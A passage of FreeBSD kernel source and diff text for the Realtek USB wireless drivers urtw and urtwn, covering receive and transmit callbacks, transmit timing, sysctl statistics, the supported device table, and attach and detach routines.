usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); if (actlen < (int)URTW_MIN_RXBUFSZ) { ifp->if_ierrors++; return (NULL); } if (sc->sc_flags & URTW_RTL8187B) { struct urtw_8187b_rxhdr *rx; rx = (struct urtw_8187b_rxhdr *)(data->buf + (actlen - (sizeof(struct urtw_8187b_rxhdr)))); flen = le32toh(rx->flag) & 0xfff; if (flen > actlen) { ifp->if_ierrors++; return (NULL); } rate = (le32toh(rx->flag) >> URTW_RX_FLAG_RXRATE_SHIFT) & 0xf; /* XXX correct? */ rssi = rx->rssi & URTW_RX_RSSI_MASK; noise = rx->noise; } else { struct urtw_8187l_rxhdr *rx; rx = (struct urtw_8187l_rxhdr *)(data->buf + (actlen - (sizeof(struct urtw_8187l_rxhdr)))); flen = le32toh(rx->flag) & 0xfff; if (flen > actlen) { ifp->if_ierrors++; return (NULL); } rate = (le32toh(rx->flag) >> URTW_RX_FLAG_RXRATE_SHIFT) & 0xf; /* XXX correct? */ rssi = rx->rssi & URTW_RX_8187L_RSSI_MASK; noise = rx->noise; } mnew = m_getcl(M_NOWAIT, MT_DATA, M_PKTHDR); if (mnew == NULL) { ifp->if_ierrors++; return (NULL); } m = data->m; data->m = mnew; data->buf = mtod(mnew, uint8_t *); /* finalize mbuf */ m->m_pkthdr.rcvif = ifp; m->m_pkthdr.len = m->m_len = flen - IEEE80211_CRC_LEN; if (ieee80211_radiotap_active(ic)) { struct urtw_rx_radiotap_header *tap = &sc->sc_rxtap; /* XXX Are variables correct? */ tap->wr_chan_freq = htole16(ic->ic_curchan->ic_freq); tap->wr_chan_flags = htole16(ic->ic_curchan->ic_flags); tap->wr_dbm_antsignal = (int8_t)rssi; } wh = mtod(m, struct ieee80211_frame *); if ((wh->i_fc[0] & IEEE80211_FC0_TYPE_MASK) == IEEE80211_FC0_TYPE_DATA) sc->sc_currate = (rate > 0) ? rate : sc->sc_currate; *rssi_p = rssi; *nf_p = noise; /* XXX correct? */ return (m); } static void urtw_bulk_rx_callback(struct usb_xfer *xfer, usb_error_t error) { struct urtw_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct ieee80211_frame *wh; struct ieee80211_node *ni; struct mbuf *m = NULL; struct urtw_data *data; int8_t nf = -95; int rssi = 1; URTW_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_rx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); m = urtw_rxeof(xfer, data, &rssi, &nf); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_rx_inactive); if (data == NULL) { KASSERT(m == NULL, ("mbuf isn't NULL")); return; } STAILQ_REMOVE_HEAD(&sc->sc_rx_inactive, next); STAILQ_INSERT_TAIL(&sc->sc_rx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, usbd_xfer_max_len(xfer)); usbd_transfer_submit(xfer); /* * To avoid LOR we should unlock our private mutex here to call * ieee80211_input() because here is at the end of a USB * callback and safe to unlock. */ URTW_UNLOCK(sc); if (m != NULL) { wh = mtod(m, struct ieee80211_frame *); ni = ieee80211_find_rxnode(ic, (struct ieee80211_frame_min *)wh); if (ni != NULL) { (void) ieee80211_input(ni, m, rssi, nf); /* node is no longer needed */ ieee80211_free_node(ni); } else (void) ieee80211_input_all(ic, m, rssi, nf); m = NULL; } URTW_LOCK(sc); break; default: /* needs it to the inactive queue due to a error. 
*/ data = STAILQ_FIRST(&sc->sc_rx_active); if (data != NULL) { STAILQ_REMOVE_HEAD(&sc->sc_rx_active, next); STAILQ_INSERT_TAIL(&sc->sc_rx_inactive, data, next); } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto setup; } break; } } #define URTW_STATUS_TYPE_TXCLOSE 1 #define URTW_STATUS_TYPE_BEACON_INTR 0 static void urtw_txstatus_eof(struct usb_xfer *xfer) { struct urtw_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; int actlen, type, pktretry, seq; uint64_t val; usbd_xfer_status(xfer, &actlen, NULL, NULL, NULL); if (actlen != sizeof(uint64_t)) return; val = le64toh(sc->sc_txstatus); type = (val >> 30) & 0x3; if (type == URTW_STATUS_TYPE_TXCLOSE) { pktretry = val & 0xff; seq = (val >> 16) & 0xff; if (pktretry == URTW_TX_MAXRETRY) ifp->if_oerrors++; DPRINTF(sc, URTW_DEBUG_TXSTATUS, "pktretry %d seq %#x\n", pktretry, seq); } } static void urtw_bulk_tx_status_callback(struct usb_xfer *xfer, usb_error_t error) { struct urtw_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; void *dma_buf = usbd_xfer_get_frame_buffer(xfer, 0); URTW_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: urtw_txstatus_eof(xfer); /* FALLTHROUGH */ case USB_ST_SETUP: setup: memcpy(dma_buf, &sc->sc_txstatus, sizeof(uint64_t)); usbd_xfer_set_frame_len(xfer, 0, sizeof(uint64_t)); usbd_transfer_submit(xfer); break; default: if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); ifp->if_ierrors++; goto setup; } break; } } static void urtw_txeof(struct usb_xfer *xfer, struct urtw_data *data) { struct urtw_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct mbuf *m; URTW_ASSERT_LOCKED(sc); /* * Do any tx complete callback. Note this must be done before releasing * the node reference. */ if (data->m) { m = data->m; if (m->m_flags & M_TXCB) { /* XXX status? 
*/ ieee80211_process_callback(data->ni, m, 0); } m_freem(m); data->m = NULL; } if (data->ni) { ieee80211_free_node(data->ni); data->ni = NULL; } sc->sc_txtimer = 0; ifp->if_opackets++; ifp->if_drv_flags &= ~IFF_DRV_OACTIVE; } static void urtw_bulk_tx_callback(struct usb_xfer *xfer, usb_error_t error) { struct urtw_softc *sc = usbd_xfer_softc(xfer); struct ifnet *ifp = sc->sc_ifp; struct urtw_data *data; URTW_ASSERT_LOCKED(sc); switch (USB_GET_STATE(xfer)) { case USB_ST_TRANSFERRED: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; STAILQ_REMOVE_HEAD(&sc->sc_tx_active, next); urtw_txeof(xfer, data); STAILQ_INSERT_TAIL(&sc->sc_tx_inactive, data, next); /* FALLTHROUGH */ case USB_ST_SETUP: setup: data = STAILQ_FIRST(&sc->sc_tx_pending); if (data == NULL) { DPRINTF(sc, URTW_DEBUG_XMIT, "%s: empty pending queue\n", __func__); return; } STAILQ_REMOVE_HEAD(&sc->sc_tx_pending, next); STAILQ_INSERT_TAIL(&sc->sc_tx_active, data, next); usbd_xfer_set_frame_data(xfer, 0, data->buf, data->buflen); usbd_transfer_submit(xfer); URTW_UNLOCK(sc); urtw_start(ifp); URTW_LOCK(sc); break; default: data = STAILQ_FIRST(&sc->sc_tx_active); if (data == NULL) goto setup; if (data->ni != NULL) { ieee80211_free_node(data->ni); data->ni = NULL; ifp->if_oerrors++; } if (error != USB_ERR_CANCELLED) { usbd_xfer_set_stall(xfer); goto setup; } break; } } static struct urtw_data * _urtw_getbuf(struct urtw_softc *sc) { struct urtw_data *bf; bf = STAILQ_FIRST(&sc->sc_tx_inactive); if (bf != NULL) STAILQ_REMOVE_HEAD(&sc->sc_tx_inactive, next); else bf = NULL; if (bf == NULL) DPRINTF(sc, URTW_DEBUG_XMIT, "%s: %s\n", __func__, "out of xmit buffers"); return (bf); } static struct urtw_data * urtw_getbuf(struct urtw_softc *sc) { struct urtw_data *bf; URTW_ASSERT_LOCKED(sc); bf = _urtw_getbuf(sc); if (bf == NULL) { struct ifnet *ifp = sc->sc_ifp; DPRINTF(sc, URTW_DEBUG_XMIT, "%s: stop queue\n", __func__); ifp->if_drv_flags |= IFF_DRV_OACTIVE; } return (bf); } static int urtw_isbmode(uint16_t rate) { return ((rate <= 22 && rate != 12 && rate != 18) || rate == 44) ? (1) : (0); } static uint16_t urtw_rate2dbps(uint16_t rate) { switch(rate) { case 12: case 18: case 24: case 36: case 48: case 72: case 96: case 108: return (rate * 2); default: break; } return (24); } static int urtw_compute_txtime(uint16_t framelen, uint16_t rate, uint8_t ismgt, uint8_t isshort) { uint16_t ceiling, frametime, n_dbps; if (urtw_isbmode(rate)) { if (ismgt || !isshort || rate == 2) frametime = (uint16_t)(144 + 48 + (framelen * 8 / (rate / 2))); else frametime = (uint16_t)(72 + 24 + (framelen * 8 / (rate / 2))); if ((framelen * 8 % (rate / 2)) != 0) frametime++; } else { n_dbps = urtw_rate2dbps(rate); ceiling = (16 + 8 * framelen + 6) / n_dbps + (((16 + 8 * framelen + 6) % n_dbps) ? 1 : 0); frametime = (uint16_t)(16 + 4 + 4 * ceiling + 6); } return (frametime); } /* * Callback from the 802.11 layer to update the * slot time based on the current setting. 
*/ static void urtw_updateslot(struct ifnet *ifp) { struct urtw_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; ieee80211_runtask(ic, &sc->sc_updateslot_task); } static void urtw_updateslottask(void *arg, int pending) { struct urtw_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int error; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; URTW_LOCK(sc); if (sc->sc_flags & URTW_RTL8187B) { urtw_write8_m(sc, URTW_SIFS, 0x22); if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan)) urtw_write8_m(sc, URTW_SLOT, 0x9); else urtw_write8_m(sc, URTW_SLOT, 0x14); urtw_write8_m(sc, URTW_8187B_EIFS, 0x5b); urtw_write8_m(sc, URTW_CARRIER_SCOUNT, 0x5b); } else { urtw_write8_m(sc, URTW_SIFS, 0x22); if (sc->sc_state == IEEE80211_S_ASSOC && ic->ic_flags & IEEE80211_F_SHSLOT) urtw_write8_m(sc, URTW_SLOT, 0x9); else urtw_write8_m(sc, URTW_SLOT, 0x14); if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan)) { urtw_write8_m(sc, URTW_DIFS, 0x14); urtw_write8_m(sc, URTW_EIFS, 0x5b - 0x14); urtw_write8_m(sc, URTW_CW_VAL, 0x73); } else { urtw_write8_m(sc, URTW_DIFS, 0x24); urtw_write8_m(sc, URTW_EIFS, 0x5b - 0x24); urtw_write8_m(sc, URTW_CW_VAL, 0xa5); } } fail: URTW_UNLOCK(sc); } static void urtw_sysctl_node(struct urtw_softc *sc) { #define URTW_SYSCTL_STAT_ADD32(c, h, n, p, d) \ SYSCTL_ADD_UINT(c, h, OID_AUTO, n, CTLFLAG_RD, p, 0, d) struct sysctl_ctx_list *ctx; struct sysctl_oid_list *child, *parent; struct sysctl_oid *tree; struct urtw_stats *stats = &sc->sc_stats; ctx = device_get_sysctl_ctx(sc->sc_dev); child = SYSCTL_CHILDREN(device_get_sysctl_tree(sc->sc_dev)); tree = SYSCTL_ADD_NODE(ctx, child, OID_AUTO, "stats", CTLFLAG_RD, NULL, "URTW statistics"); parent = SYSCTL_CHILDREN(tree); /* Tx statistics. */ tree = SYSCTL_ADD_NODE(ctx, parent, OID_AUTO, "tx", CTLFLAG_RD, NULL, "Tx MAC statistics"); child = SYSCTL_CHILDREN(tree); URTW_SYSCTL_STAT_ADD32(ctx, child, "1m", &stats->txrates[0], "1 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "2m", &stats->txrates[1], "2 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "5.5m", &stats->txrates[2], "5.5 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "6m", &stats->txrates[4], "6 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "9m", &stats->txrates[5], "9 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "11m", &stats->txrates[3], "11 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "12m", &stats->txrates[6], "12 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "18m", &stats->txrates[7], "18 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "24m", &stats->txrates[8], "24 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "36m", &stats->txrates[9], "36 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "48m", &stats->txrates[10], "48 Mbit/s"); URTW_SYSCTL_STAT_ADD32(ctx, child, "54m", &stats->txrates[11], "54 Mbit/s"); #undef URTW_SYSCTL_STAT_ADD32 } static device_method_t urtw_methods[] = { DEVMETHOD(device_probe, urtw_match), DEVMETHOD(device_attach, urtw_attach), DEVMETHOD(device_detach, urtw_detach), DEVMETHOD_END }; static driver_t urtw_driver = { .name = "urtw", .methods = urtw_methods, .size = sizeof(struct urtw_softc) }; static devclass_t urtw_devclass; DRIVER_MODULE(urtw, uhub, urtw_driver, urtw_devclass, NULL, 0); MODULE_DEPEND(urtw, wlan, 1, 1, 1); MODULE_DEPEND(urtw, usb, 1, 1, 1); MODULE_VERSION(urtw, 1); diff --git a/sys/dev/usb/wlan/if_urtwn.c b/sys/dev/usb/wlan/if_urtwn.c index de4184c24b9b..10266b827e3d 100644 --- a/sys/dev/usb/wlan/if_urtwn.c +++ b/sys/dev/usb/wlan/if_urtwn.c @@ -1,3033 +1,3033 @@ /* $OpenBSD: if_urtwn.c,v 1.16 2011/02/10 17:26:40 
jakemsr Exp $ */ /*- * Copyright (c) 2010 Damien Bergamini * * Permission to use, copy, modify, and distribute this software for any * purpose with or without fee is hereby granted, provided that the above * copyright notice and this permission notice appear in all copies. * * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. */ #include __FBSDID("$FreeBSD$"); /* * Driver for Realtek RTL8188CE-VAU/RTL8188CUS/RTL8188RU/RTL8192CU. */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "usbdevs.h" #define USB_DEBUG_VAR urtwn_debug #include #include #ifdef USB_DEBUG static int urtwn_debug = 0; SYSCTL_NODE(_hw_usb, OID_AUTO, urtwn, CTLFLAG_RW, 0, "USB urtwn"); SYSCTL_INT(_hw_usb_urtwn, OID_AUTO, debug, CTLFLAG_RW, &urtwn_debug, 0, "Debug level"); #endif #define URTWN_RSSI(r) (r) - 110 #define IEEE80211_HAS_ADDR4(wh) \ (((wh)->i_fc[1] & IEEE80211_FC1_DIR_MASK) == IEEE80211_FC1_DIR_DSTODS) /* various supported device vendors/products */ static const STRUCT_USB_HOST_ID urtwn_devs[] = { #define URTWN_DEV(v,p) { USB_VP(USB_VENDOR_##v, USB_PRODUCT_##v##_##p) } URTWN_DEV(ABOCOM, RTL8188CU_1), URTWN_DEV(ABOCOM, RTL8188CU_2), URTWN_DEV(ABOCOM, RTL8192CU), URTWN_DEV(ASUS, RTL8192CU), URTWN_DEV(AZUREWAVE, RTL8188CE_1), URTWN_DEV(AZUREWAVE, RTL8188CE_2), URTWN_DEV(AZUREWAVE, RTL8188CU), URTWN_DEV(BELKIN, F7D2102), URTWN_DEV(BELKIN, RTL8188CU), URTWN_DEV(BELKIN, RTL8192CU), URTWN_DEV(CHICONY, RTL8188CUS_1), URTWN_DEV(CHICONY, RTL8188CUS_2), URTWN_DEV(CHICONY, RTL8188CUS_3), URTWN_DEV(CHICONY, RTL8188CUS_4), URTWN_DEV(CHICONY, RTL8188CUS_5), URTWN_DEV(COREGA, RTL8192CU), URTWN_DEV(DLINK, RTL8188CU), URTWN_DEV(DLINK, RTL8192CU_1), URTWN_DEV(DLINK, RTL8192CU_2), URTWN_DEV(DLINK, RTL8192CU_3), URTWN_DEV(DLINK, DWA131B), URTWN_DEV(EDIMAX, EW7811UN), URTWN_DEV(EDIMAX, RTL8192CU), URTWN_DEV(FEIXUN, RTL8188CU), URTWN_DEV(FEIXUN, RTL8192CU), URTWN_DEV(GUILLEMOT, HWNUP150), URTWN_DEV(HAWKING, RTL8192CU), URTWN_DEV(HP3, RTL8188CU), URTWN_DEV(NETGEAR, WNA1000M), URTWN_DEV(NETGEAR, RTL8192CU), URTWN_DEV(NETGEAR4, RTL8188CU), URTWN_DEV(NOVATECH, RTL8188CU), URTWN_DEV(PLANEX2, RTL8188CU_1), URTWN_DEV(PLANEX2, RTL8188CU_2), URTWN_DEV(PLANEX2, RTL8188CU_3), URTWN_DEV(PLANEX2, RTL8188CU_4), URTWN_DEV(PLANEX2, RTL8188CUS), URTWN_DEV(PLANEX2, RTL8192CU), URTWN_DEV(REALTEK, RTL8188CE_0), URTWN_DEV(REALTEK, RTL8188CE_1), URTWN_DEV(REALTEK, RTL8188CTV), URTWN_DEV(REALTEK, RTL8188CU_0), URTWN_DEV(REALTEK, RTL8188CU_1), URTWN_DEV(REALTEK, RTL8188CU_2), URTWN_DEV(REALTEK, RTL8188CU_COMBO), URTWN_DEV(REALTEK, RTL8188CUS), URTWN_DEV(REALTEK, RTL8188RU_1), URTWN_DEV(REALTEK, RTL8188RU_2), URTWN_DEV(REALTEK, RTL8191CU), URTWN_DEV(REALTEK, RTL8192CE), URTWN_DEV(REALTEK, RTL8192CU), URTWN_DEV(REALTEK, RTL8188CU_0), URTWN_DEV(SITECOMEU, RTL8188CU_1), URTWN_DEV(SITECOMEU, RTL8188CU_2), URTWN_DEV(SITECOMEU, 
RTL8192CU), URTWN_DEV(TRENDNET, RTL8188CU), URTWN_DEV(TRENDNET, RTL8192CU), URTWN_DEV(ZYXEL, RTL8192CU), #undef URTWN_DEV }; static device_probe_t urtwn_match; static device_attach_t urtwn_attach; static device_detach_t urtwn_detach; static usb_callback_t urtwn_bulk_tx_callback; static usb_callback_t urtwn_bulk_rx_callback; static usb_error_t urtwn_do_request(struct urtwn_softc *sc, struct usb_device_request *req, void *data); static struct ieee80211vap *urtwn_vap_create(struct ieee80211com *, const char [IFNAMSIZ], int, enum ieee80211_opmode, int, const uint8_t [IEEE80211_ADDR_LEN], const uint8_t [IEEE80211_ADDR_LEN]); static void urtwn_vap_delete(struct ieee80211vap *); static struct mbuf * urtwn_rx_frame(struct urtwn_softc *, uint8_t *, int, int *); static struct mbuf * urtwn_rxeof(struct usb_xfer *, struct urtwn_data *, int *, int8_t *); static void urtwn_txeof(struct usb_xfer *, struct urtwn_data *); static int urtwn_alloc_list(struct urtwn_softc *, struct urtwn_data[], int, int); static int urtwn_alloc_rx_list(struct urtwn_softc *); static int urtwn_alloc_tx_list(struct urtwn_softc *); static void urtwn_free_tx_list(struct urtwn_softc *); static void urtwn_free_rx_list(struct urtwn_softc *); static void urtwn_free_list(struct urtwn_softc *, struct urtwn_data data[], int); static struct urtwn_data * _urtwn_getbuf(struct urtwn_softc *); static struct urtwn_data * urtwn_getbuf(struct urtwn_softc *); static int urtwn_write_region_1(struct urtwn_softc *, uint16_t, uint8_t *, int); static void urtwn_write_1(struct urtwn_softc *, uint16_t, uint8_t); static void urtwn_write_2(struct urtwn_softc *, uint16_t, uint16_t); static void urtwn_write_4(struct urtwn_softc *, uint16_t, uint32_t); static int urtwn_read_region_1(struct urtwn_softc *, uint16_t, uint8_t *, int); static uint8_t urtwn_read_1(struct urtwn_softc *, uint16_t); static uint16_t urtwn_read_2(struct urtwn_softc *, uint16_t); static uint32_t urtwn_read_4(struct urtwn_softc *, uint16_t); static int urtwn_fw_cmd(struct urtwn_softc *, uint8_t, const void *, int); static void urtwn_rf_write(struct urtwn_softc *, int, uint8_t, uint32_t); static uint32_t urtwn_rf_read(struct urtwn_softc *, int, uint8_t); static int urtwn_llt_write(struct urtwn_softc *, uint32_t, uint32_t); static uint8_t urtwn_efuse_read_1(struct urtwn_softc *, uint16_t); static void urtwn_efuse_read(struct urtwn_softc *); static int urtwn_read_chipid(struct urtwn_softc *); static void urtwn_read_rom(struct urtwn_softc *); static int urtwn_ra_init(struct urtwn_softc *); static void urtwn_tsf_sync_enable(struct urtwn_softc *); static void urtwn_set_led(struct urtwn_softc *, int, int); static int urtwn_newstate(struct ieee80211vap *, enum ieee80211_state, int); static void urtwn_watchdog(void *); static void urtwn_update_avgrssi(struct urtwn_softc *, int, int8_t); static int8_t urtwn_get_rssi(struct urtwn_softc *, int, void *); static int urtwn_tx_start(struct urtwn_softc *, struct ieee80211_node *, struct mbuf *, struct urtwn_data *); static void urtwn_start(struct ifnet *); static int urtwn_ioctl(struct ifnet *, u_long, caddr_t); static int urtwn_power_on(struct urtwn_softc *); static int urtwn_llt_init(struct urtwn_softc *); static void urtwn_fw_reset(struct urtwn_softc *); static int urtwn_fw_loadpage(struct urtwn_softc *, int, const uint8_t *, int); static int urtwn_load_firmware(struct urtwn_softc *); static int urtwn_dma_init(struct urtwn_softc *); static void urtwn_mac_init(struct urtwn_softc *); static void urtwn_bb_init(struct urtwn_softc *); static void 
urtwn_rf_init(struct urtwn_softc *); static void urtwn_cam_init(struct urtwn_softc *); static void urtwn_pa_bias_init(struct urtwn_softc *); static void urtwn_rxfilter_init(struct urtwn_softc *); static void urtwn_edca_init(struct urtwn_softc *); static void urtwn_write_txpower(struct urtwn_softc *, int, uint16_t[]); static void urtwn_get_txpower(struct urtwn_softc *, int, struct ieee80211_channel *, struct ieee80211_channel *, uint16_t[]); static void urtwn_set_txpower(struct urtwn_softc *, struct ieee80211_channel *, struct ieee80211_channel *); static void urtwn_scan_start(struct ieee80211com *); static void urtwn_scan_end(struct ieee80211com *); static void urtwn_set_channel(struct ieee80211com *); static void urtwn_set_chan(struct urtwn_softc *, struct ieee80211_channel *, struct ieee80211_channel *); static void urtwn_update_mcast(struct ifnet *); static void urtwn_iq_calib(struct urtwn_softc *); static void urtwn_lc_calib(struct urtwn_softc *); static void urtwn_init(void *); static void urtwn_init_locked(void *); static void urtwn_stop(struct ifnet *, int); static void urtwn_stop_locked(struct ifnet *, int); static void urtwn_abort_xfers(struct urtwn_softc *); static int urtwn_raw_xmit(struct ieee80211_node *, struct mbuf *, const struct ieee80211_bpf_params *); /* Aliases. */ #define urtwn_bb_write urtwn_write_4 #define urtwn_bb_read urtwn_read_4 static const struct usb_config urtwn_config[URTWN_N_TRANSFER] = { [URTWN_BULK_RX] = { .type = UE_BULK, .endpoint = UE_ADDR_ANY, .direction = UE_DIR_IN, .bufsize = URTWN_RXBUFSZ, .flags = { .pipe_bof = 1, .short_xfer_ok = 1 }, .callback = urtwn_bulk_rx_callback, }, [URTWN_BULK_TX_BE] = { .type = UE_BULK, .endpoint = 0x03, .direction = UE_DIR_OUT, .bufsize = URTWN_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = urtwn_bulk_tx_callback, .timeout = URTWN_TX_TIMEOUT, /* ms */ }, [URTWN_BULK_TX_BK] = { .type = UE_BULK, .endpoint = 0x03, .direction = UE_DIR_OUT, .bufsize = URTWN_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1, }, .callback = urtwn_bulk_tx_callback, .timeout = URTWN_TX_TIMEOUT, /* ms */ }, [URTWN_BULK_TX_VI] = { .type = UE_BULK, .endpoint = 0x02, .direction = UE_DIR_OUT, .bufsize = URTWN_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = urtwn_bulk_tx_callback, .timeout = URTWN_TX_TIMEOUT, /* ms */ }, [URTWN_BULK_TX_VO] = { .type = UE_BULK, .endpoint = 0x02, .direction = UE_DIR_OUT, .bufsize = URTWN_TXBUFSZ, .flags = { .ext_buffer = 1, .pipe_bof = 1, .force_short_xfer = 1 }, .callback = urtwn_bulk_tx_callback, .timeout = URTWN_TX_TIMEOUT, /* ms */ }, }; static int urtwn_match(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); if (uaa->usb_mode != USB_MODE_HOST) return (ENXIO); if (uaa->info.bConfigIndex != URTWN_CONFIG_INDEX) return (ENXIO); if (uaa->info.bIfaceIndex != URTWN_IFACE_INDEX) return (ENXIO); return (usbd_lookup_id_by_uaa(urtwn_devs, sizeof(urtwn_devs), uaa)); } static int urtwn_attach(device_t self) { struct usb_attach_arg *uaa = device_get_ivars(self); struct urtwn_softc *sc = device_get_softc(self); struct ifnet *ifp; struct ieee80211com *ic; uint8_t iface_index, bands; int error; device_set_usb_desc(self); sc->sc_udev = uaa->device; sc->sc_dev = self; mtx_init(&sc->sc_mtx, device_get_nameunit(self), MTX_NETWORK_LOCK, MTX_DEF); callout_init(&sc->sc_watchdog_ch, 0); iface_index = URTWN_IFACE_INDEX; error = usbd_transfer_setup(uaa->device, &iface_index, sc->sc_xfer, urtwn_config, 
URTWN_N_TRANSFER, sc, &sc->sc_mtx); if (error) { device_printf(self, "could not allocate USB transfers, " "err=%s\n", usbd_errstr(error)); goto detach; } URTWN_LOCK(sc); error = urtwn_read_chipid(sc); if (error) { device_printf(sc->sc_dev, "unsupported test chip\n"); URTWN_UNLOCK(sc); goto detach; } /* Determine number of Tx/Rx chains. */ if (sc->chip & URTWN_CHIP_92C) { sc->ntxchains = (sc->chip & URTWN_CHIP_92C_1T2R) ? 1 : 2; sc->nrxchains = 2; } else { sc->ntxchains = 1; sc->nrxchains = 1; } urtwn_read_rom(sc); device_printf(sc->sc_dev, "MAC/BB RTL%s, RF 6052 %dT%dR\n", (sc->chip & URTWN_CHIP_92C) ? "8192CU" : (sc->board_type == R92C_BOARD_TYPE_HIGHPA) ? "8188RU" : (sc->board_type == R92C_BOARD_TYPE_MINICARD) ? "8188CE-VAU" : "8188CUS", sc->ntxchains, sc->nrxchains); URTWN_UNLOCK(sc); ifp = sc->sc_ifp = if_alloc(IFT_IEEE80211); if (ifp == NULL) { device_printf(sc->sc_dev, "can not if_alloc()\n"); goto detach; } ic = ifp->if_l2com; ifp->if_softc = sc; if_initname(ifp, "urtwn", device_get_unit(sc->sc_dev)); ifp->if_flags = IFF_BROADCAST | IFF_SIMPLEX | IFF_MULTICAST; ifp->if_init = urtwn_init; ifp->if_ioctl = urtwn_ioctl; ifp->if_start = urtwn_start; IFQ_SET_MAXLEN(&ifp->if_snd, ifqmaxlen); ifp->if_snd.ifq_drv_maxlen = ifqmaxlen; IFQ_SET_READY(&ifp->if_snd); ic->ic_ifp = ifp; ic->ic_phytype = IEEE80211_T_OFDM; /* not only, but not used */ ic->ic_opmode = IEEE80211_M_STA; /* default to BSS mode */ /* set device capabilities */ ic->ic_caps = IEEE80211_C_STA /* station mode */ | IEEE80211_C_MONITOR /* monitor mode */ | IEEE80211_C_SHPREAMBLE /* short preamble supported */ | IEEE80211_C_SHSLOT /* short slot time supported */ | IEEE80211_C_BGSCAN /* capable of bg scanning */ | IEEE80211_C_WPA /* 802.11i */ ; bands = 0; setbit(&bands, IEEE80211_MODE_11B); setbit(&bands, IEEE80211_MODE_11G); ieee80211_init_channels(ic, NULL, &bands); ieee80211_ifattach(ic, sc->sc_bssid); ic->ic_raw_xmit = urtwn_raw_xmit; ic->ic_scan_start = urtwn_scan_start; ic->ic_scan_end = urtwn_scan_end; ic->ic_set_channel = urtwn_set_channel; ic->ic_vap_create = urtwn_vap_create; ic->ic_vap_delete = urtwn_vap_delete; ic->ic_update_mcast = urtwn_update_mcast; ieee80211_radiotap_attach(ic, &sc->sc_txtap.wt_ihdr, sizeof(sc->sc_txtap), URTWN_TX_RADIOTAP_PRESENT, &sc->sc_rxtap.wr_ihdr, sizeof(sc->sc_rxtap), URTWN_RX_RADIOTAP_PRESENT); if (bootverbose) ieee80211_announce(ic); return (0); detach: urtwn_detach(self); return (ENXIO); /* failure */ } static int urtwn_detach(device_t self) { struct urtwn_softc *sc = device_get_softc(self); struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; if (!device_is_attached(self)) return (0); urtwn_stop(ifp, 1); callout_drain(&sc->sc_watchdog_ch); /* stop all USB transfers */ usbd_transfer_unsetup(sc->sc_xfer, URTWN_N_TRANSFER); ieee80211_ifdetach(ic); urtwn_free_tx_list(sc); urtwn_free_rx_list(sc); if_free(ifp); mtx_destroy(&sc->sc_mtx); return (0); } static void urtwn_free_tx_list(struct urtwn_softc *sc) { urtwn_free_list(sc, sc->sc_tx, URTWN_TX_LIST_COUNT); } static void urtwn_free_rx_list(struct urtwn_softc *sc) { urtwn_free_list(sc, sc->sc_rx, URTWN_RX_LIST_COUNT); } static void urtwn_free_list(struct urtwn_softc *sc, struct urtwn_data data[], int ndata) { int i; for (i = 0; i < ndata; i++) { struct urtwn_data *dp = &data[i]; if (dp->buf != NULL) { free(dp->buf, M_USBDEV); dp->buf = NULL; } if (dp->ni != NULL) { ieee80211_free_node(dp->ni); dp->ni = NULL; } } } static usb_error_t urtwn_do_request(struct urtwn_softc *sc, struct usb_device_request *req, void *data) { 
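	/*
	 * Vendor control requests are retried: up to 10 attempts, each with
	 * a 250 ms timeout, separated by a ~10 ms pause (hz / 100 ticks),
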